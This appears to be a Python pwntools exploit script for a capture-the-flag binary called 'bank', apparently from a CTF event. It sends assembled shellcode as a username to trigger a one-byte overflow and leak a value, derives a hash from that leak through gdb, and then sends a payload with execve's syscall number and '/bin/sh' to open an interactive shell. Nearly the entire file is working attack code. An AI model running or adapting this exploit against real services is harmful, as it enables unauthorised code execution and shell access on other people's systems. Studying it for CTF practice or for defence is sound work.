from pwn import *
import subprocess
# pwntools context for the target binary: 64-bit Linux, logging at 'info'.
context(arch='amd64', os='linux', log_level='info')
# Assembled at import time into raw machine-code bytes; get_treasure() sends these
# bytes verbatim as the "username" (see the overflow comment there).
name_payload = asm("pop rax; push rsp; pop rcx; pop rdx; push rsp; pop rdi;syscall;")
def get_treasure(r):
    """Drive the login exchange on tube *r* and return the bytes leaked on the Welcome line.

    Sends the module-level ``name_payload`` as the username, reads the reply up to
    the ``#> `` prompt, finds the first line starting with ``Welcome`` and returns
    whatever follows ``"Welcome " + name_payload`` on that line, undecoded.

    Args:
        r: pwntools tube (``process`` or ``remote``) positioned at the login banner.

    Returns:
        str: trailing bytes of the ``Welcome`` line after the echoed username.

    Raises:
        IndexError: if no line starts with ``Welcome`` -- the scan then leaves
            ``x == len(a)`` and ``a[x]`` indexes past the end of the list.
    """
    #pass login and leak rand.
    print r.recvuntil("Username: ")
    r.send(name_payload) # 8 characters of input, 1 byte overflow.
    a = r.recvuntil('#> ')
    print a
    a = a.split("\n")
    # Scan for the first 'Welcome' line; on exit x indexes it (or len(a) if absent).
    x = 0
    while x < len(a):
        if a[x].startswith('Welcome'):
            #x += 1
            break
        x += 1
    print "raw : ",raw(a[x])  # raw() is the hex helper defined below
    # Strip the banner word and the echoed username; what remains is the leak.
    treasure = a[x].strip().replace("Welcome "+name_payload, "")
    return treasure
def raw(a):
    """Return *a* rendered as lowercase hex, two characters per byte."""
    return "".join("%02x" % ord(ch) for ch in a)
# --- main script: start the target, recover the leaked value, run gdb, then finish the session ---
r = process('./bank')
#r = remote('pwn.sect.ctf.rocks', 31337)
raw_input()  # blocks until Enter is pressed before any traffic is sent
treasure = get_treasure(r)
print raw(treasure)
# Reverse the byte order, then parse as hex: i.e. read the leaked bytes as a little-endian integer.
treasure = int(treasure[::-1].encode('hex'), 16)
print "got leak", treasure
from subprocess import call  # NOTE(review): `call` is never used; subprocess is already imported at the top
# Written to disk but not read anywhere on this page.
fp = open("payload_bank", "wb")
fp.write(name_payload+'2\nAAAAA\r\n')
fp.close()
# Run gdb with the leaked value bound to `seed` and the helper script ./bank_gdb.py (not shown);
# the last whitespace-separated token of gdb's final output line becomes `h`.
# NOTE(review): shell=True with string interpolation is only safe here because str(int) cannot
# carry shell metacharacters; the Popen is never wait()ed and its stdout pipe is never closed.
d = subprocess.Popen("gdb -ex 'py seed = " + str(treasure) + "' -x ./bank_gdb.py ", shell=True, stdout=subprocess.PIPE).stdout.read().strip()
print d
h = d.split("\n")[-1].strip().split(" ")[-1]
r.send("2\n")  # menu option 2
r.recvuntil("Please enter your secure hash: ")
r.send(h)
# Final input: 16 NUL bytes followed by packed 8-byte words (p64, endianness from context) and a string.
# NOTE(review): these constants are specific to ./bank's layout, which is not shown on this page.
rbp = 0xdeadbeef
rip = 0x40000
payload = "\x00" * 16 + p64(rbp) + p64(rip)
payload += p64(0x3b)
payload += p64(0)
payload += "/bin/sh\x00"
payload += "BBB"
r.send(payload)
r.interactive()  # hand the tube over to the terminal